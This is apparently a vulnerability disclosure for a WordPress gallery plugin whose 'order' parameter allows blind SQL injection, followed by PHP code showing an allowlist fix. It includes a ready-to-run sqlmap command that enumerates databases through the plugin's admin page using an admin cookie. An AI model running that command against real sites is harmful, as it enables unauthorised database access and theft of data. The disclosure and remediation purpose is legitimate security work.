The plugin is still affected and has been closed. Type of user access: admin user. $_GET['order'] is escaped incorrectly. Attack with blind injection:
python sqlmap.py -u "http://www.example.com/wp-admin/admin.php?page=zm_gallery&orderby=name&order=desc" --dbs --cookie="cookie of admin user" --level=5 --dbms=mysql
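Escaping cannot protect the order parameter because a sort direction is SQL syntax, not a quoted string, so the fix is an allowlist. The following is an added example, not the plugin's own code: the function names, the column map and the use of addslashes() as a stand-in for the plugin's escaping call are all assumptions.

```php
<?php
// Hypothetical map of public sort keys to real column names (assumed).
const ZM_SORTABLE_COLUMNS = ['name' => 'name', 'date' => 'created_at', 'id' => 'id'];

// Pattern of the flaw: the values are escaped, but escaping only neutralises
// quote characters. An ORDER BY term sits outside any quoted literal, so any
// text without quotes passes through unchanged and is parsed as SQL.
function order_clause_escaped(array $query): string
{
    $orderby = addslashes($query['orderby'] ?? 'name');
    $order   = addslashes($query['order'] ?? 'asc');
    return "ORDER BY {$orderby} {$order}";
}

// Hardened form: the request only selects among fixed strings, and nothing
// from the request is ever copied into the SQL text.
function order_clause_allowlisted(array $query): string
{
    $orderby = $query['orderby'] ?? '';
    $order   = $query['order'] ?? '';
    // Non-string input (e.g. ?order[]=x arrives as an array) falls to defaults.
    $key       = is_string($orderby) ? strtolower($orderby) : '';
    $column    = ZM_SORTABLE_COLUMNS[$key] ?? 'name';
    $direction = (is_string($order) && strtolower($order) === 'desc') ? 'DESC' : 'ASC';
    return "ORDER BY `{$column}` {$direction}";
}

// Constructed sample inputs, not captured traffic.
$samples = [
    ['orderby' => 'name', 'order' => 'desc'],
    ['orderby' => 'name', 'order' => 'desc, id'], // no quotes, so escaping is a no-op
];

foreach ($samples as $q) {
    echo 'escaped:     ', order_clause_escaped($q), PHP_EOL;
    echo 'allowlisted: ', order_clause_allowlisted($q), PHP_EOL;
}
```

For the second sample the escaped version emits the extra sort term verbatim, while the allowlisted version falls back to ASC.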